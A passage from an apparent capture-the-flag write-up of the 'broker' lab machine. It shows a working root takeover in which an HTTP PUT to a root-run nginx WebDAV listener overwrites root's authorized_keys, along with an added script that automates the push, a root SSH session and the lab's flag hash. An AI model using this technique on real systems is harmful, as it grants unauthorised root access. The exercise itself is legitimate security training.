Two conditions apply: sshd must allow key logins for root (Ubuntu's default PermitRootLogin prohibit-password does), and with StrictModes neither /root/.ssh nor the file may be group- or world-writable; nginx's default dav_access user:rw creates the file as 0600, which passes.
Store the contents of root_ssh.pub in a variable
activemq@broker:/tmp$ key=$(cat root_ssh.pub)
Overwrite authorized_keys
activemq@broker:/tmp$ curl -X PUT localhost:3333/root/.ssh/authorized_keys -d "$key"
The quotes matter: the key line contains spaces, so an unquoted $key is word-split and only "ssh-rsa" would be sent as the body, with the base64 blob and the comment treated as extra URLs. curl -T root_ssh.pub localhost:3333/root/.ssh/authorized_keys does the same PUT without the variable; nginx answers 201 for a newly created file and 204 when it overwrote an existing one.
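As an added example (not the write-up's own command), here is a script that performs the same PUT carefully and verifies it: it validates the key line, uploads the file with curl's -T, checks for a 201/204 status and reads the file back through the same listener. It assumes the listener from the config above (127.0.0.1:3333, root /, dav_methods PUT) and the /root/.ssh/authorized_keys path; the key lines used in the test are constructed, not real keys.

```shell
#!/usr/bin/env bash
# Added example, not the write-up's command: push an OpenSSH public key through
# the root-running nginx WebDAV listener from the config above and confirm the
# write. Assumptions: nginx listens on 127.0.0.1:3333 with `root /;` and
# `dav_methods PUT;`, so the URL path equals the absolute filesystem path; port
# and target path are taken from the walkthrough and would be adapted elsewhere.

valid_pubkey_line() {   # accept exactly one OpenSSH public-key line: "<type> <base64>[ comment]"
    printf '%s\n' "$1" | grep -Eq '^(ssh-ed25519|ssh-rsa|ecdsa-sha2-nistp(256|384|521)) [A-Za-z0-9+/]+={0,3}( .*)?$'
}

webdav_put() {          # usage: webdav_put <url> <file> ; true when nginx answers 201 (created) or 204 (overwritten)
    local code
    code=$(curl -s -o /dev/null -w '%{http_code}' -T "$2" "$1") || return 1
    case $code in
        201|204) return 0 ;;
        *) echo "PUT $1 failed: HTTP $code" >&2; return 1 ;;
    esac
}

push_authorized_key() { # usage: push_authorized_key <pubkey file> [base url]
    local pub=$1 base=${2:-http://127.0.0.1:3333} url line
    [ "$(wc -l < "$pub" | tr -d ' ')" -le 1 ] || { echo "$pub: expected a single key line" >&2; return 1; }
    line=$(head -n 1 "$pub")
    valid_pubkey_line "$line" || { echo "$pub: not an OpenSSH public key line" >&2; return 1; }
    url="$base/root/.ssh/authorized_keys"
    webdav_put "$url" "$pub" || return 1
    # read it back through the same listener (root / makes every file readable) and compare byte for byte
    curl -s "$url" | cmp -s - "$pub" || { echo "read-back of $url does not match $pub" >&2; return 1; }
    echo "installed: $line"
}

# The network part only runs when a key file is given, so the functions can be
# sourced and exercised without a live nginx.
if [ $# -ge 1 ]; then
    push_authorized_key "$1" "${2:-}"
fi
```

On the box this is `bash push_key.sh /tmp/root_ssh.pub`, followed by the same `ssh -i root_ssh root@localhost` as below; the read-back step is what tells you the PUT really landed at the path you meant rather than somewhere under a different document root.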
From the activemq user on the target, SSH to the root account with the private key
activemq@broker:/tmp$ ssh -i root_ssh root@localhost
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ED25519 key fingerprint is SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'localhost' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)

 * Documentation: https://help.ubuntu.com
 * Management: https://landscape.canonical.com
 * Support: https://ubuntu.com/advantage

System information as of Sun Oct 20 03:25:13 PM UTC 2024

System load: 0.0
Usage of /: 72.0% of 4.63GB
Memory usage: 13%
Swap usage: 0%
Processes: 164
Users logged in: 0
IPv4 address for eth0: 10.10.11.243
IPv6 address for eth0: dead:beef::250:56ff:feb9:271e

Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status

The list of available updates is more than a week old.
To check for new updates run: sudo apt update
root@broker:~# whoami
root
root@broker:~# ls
cleanup.sh root.txt
So let's cat root.txt once more
root@broker:~# cat root.txt
16de0aa36d6c7c4c7e55ea6fa167987a